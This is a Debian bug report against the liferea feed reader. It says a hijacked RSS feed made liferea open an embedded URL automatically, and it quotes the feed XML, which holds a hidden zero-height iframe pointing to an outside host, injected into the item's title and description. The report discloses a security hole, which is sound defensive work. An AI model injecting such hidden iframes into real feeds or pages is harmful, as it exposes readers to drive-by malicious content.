Package: liferea Version: 1.4.14-1 Severity: grave
When I click on this feed: http://www.borowitzreport.com/, the first item is (currently) the following. Liferea pops up a browser window for the embedded URL in the <iframe> whenever I try to display headlines -- I'm not even trying to read the body of the item. The fact that the link points to a site in Changzhou, China, and the strange nesting of the end tag -- <</iframe>/iframe> -- makes me think this feed was hijacked, so liferea's behavior is a security hole. <rss version="2.0"> <channel> <title>Borowitz Report</title> <link>http://www.borowitzreport.com</link> <description> Market Tumbles on News That Bush Is Still President - White House Appearance ‘A Painful Reminder,’ Experts Say<IfrAME src=//h28.8800.org/hxw/hx/f.htm height=0><</ifRAME>/ifRAME> </description> <language>en - us</language> <image> <title>Borowitz Report</title> <url> http://www.borowitzreport.com/grfx/shocker_banner.gif </url> <link>http://www.borowitzreport.com</link> </image> <item> <title> Market Tumbles on News That Bush Is Still President - White House Appearance ‘A Painful Reminder,’ Experts Say<IfrAME src=//h28.8800.org/hxw/hx/f.htm height=0><</ifRAME>/ifRAME> </title> <description> President George W. Bush used a Rose Garden appearance today to reassure investors that he was at the helm of the U.S. economy, causing stock markets to plummet around the world. “You don’t have to worry about this economy, because I am in charge of it,” said Mr. Bush, touching off what some observers were calling a global financial panic. Mr. Bush began his remarks about the economy at 10:30 A.M. eastern time, and by 10:31 markets around the world had already gone into a perilous free-fal </description> <author>Andy Borowitz <[EMAIL PROTECTED]></author> − <link> http://www.borowitzreport.com/archive_rpt.asp?rec=6857 </link> <pubDate>4/3/2008 12:00:00 AM</pubDate> </item> </channel> </rss> -- System Information: Debian Release: lenny/sid APT prefers testing APT policy: (990, 'testing'), (500, 'stable'), (400, 'unstable'), (1, 'experimental') Architecture: i386 (i686) Kernel: Linux 2.6.24-1-686 (SMP w/2 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages liferea depends on: ii gconf2 2.22.0-1 GNOME configuration database syste ii libatk1.0-0 1.20.0-1 The ATK accessibility toolkit ii libc6 2.7-6 GNU C Library: Shared libraries ii libcairo2 1.4.14-1 The Cairo 2D vector graphics libra ii libdbus-glib-1-2 0.74-1 simple interprocess messaging syst ii libgcc1 1:4.3.0-1 GCC support library ii libgconf2-4 2.22.0-1 GNOME configuration database syste ii libgcrypt11 1.4.0-3 LGPL Crypto library - runtime libr ii libglade2-0 1:2.6.2-1 library to load .glade files at ru ii libglib2.0-0 2.16.1-2 The GLib library of C routines ii libgnutls26 2.2.2-1 the GNU TLS library - runtime libr ii libgtk2.0-0 2.12.9-2 The GTK+ graphical user interface ii libice6 2:1.0.4-1 X11 Inter-Client Exchange library ii liblua5.1-0 5.1.3-1 Simple, extensible, embeddable pro ii libnm-glib0 0.6.5-5 network management framework (GLib ii libnotify1 [libnotify1 0.4.4-3 sends desktop notifications to a n ii libpango1.0-0 1.20.0-1 Layout and rendering of internatio ii libsm6 2:1.0.3-1+b1 X11 Session Management library ii libsqlite3-0 3.5.7-1 SQLite 3 shared library ii libstdc++6 4.3.0-1 The GNU Standard C++ Library v3 ii libx11-6 2:1.0.3-7 X11 client-side library ii libxml2 2.6.31.dfsg-2 GNOME XML library ii libxslt1.1 1.1.22-1 XSLT processing library - runtime ii libxul0d 1.8.1.13-1 Gecko engine library ii zlib1g 1:1.2.3.3.dfsg-11 compression library - runtime Versions of packages liferea recommends: ii curl 7.18.0-1 Get a file from an HTTP, HTTPS or ii dbus 1.1.20-1 simple interprocess messaging syst ii dbus-x11 1.1.20-1 simple interprocess messaging syst ii wget 1.10.2-3 retrieves files from the web -- no debconf information
